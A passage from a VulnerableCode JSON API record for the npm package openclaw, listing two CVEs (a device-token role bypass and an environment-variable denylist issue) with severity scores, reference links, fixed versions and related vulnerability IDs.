                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/2d126fc62343a7b6895351f96e4e1474bc358140",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/2d126fc62343a7b6895351f96e4e1474bc358140"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfp4-8x56-j7c5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfp4-8x56-j7c5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43584",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43584"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-denylist-in-exec-policy",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-denylist-in-exec-policy"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vfp4-8x56-j7c5",
                    "reference_id": "GHSA-vfp4-8x56-j7c5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vfp4-8x56-j7c5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-43584",
                "GHSA-vfp4-8x56-j7c5"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zu4s-jnn3-1kd8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90353?format=api",
            "vulnerability_id": "VCID-zunq-wnnf-k3fw",
            "summary": "## Impact\n\nOpenClaw `device.token.rotate` mints tokens for unapproved roles, bypassing device role-upgrade pairing.\n\nDevice token rotation could mint or preserve roles/scopes that had not gone through the intended pairing approval.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc  of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42422",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1604",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15986",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1603",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42422"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-whf9-3hcx-gq54",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-whf9-3hcx-gq54"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42422",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42422"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-role-bypass-in-device-token-rotate-function",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-role-bypass-in-device-token-rotate-function"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-whf9-3hcx-gq54",
                    "reference_id": "GHSA-whf9-3hcx-gq54",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-whf9-3hcx-gq54"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42422",
                "GHSA-whf9-3hcx-gq54"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "7.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zunq-wnnf-k3fw"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": "4.5",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22-beta.1"
}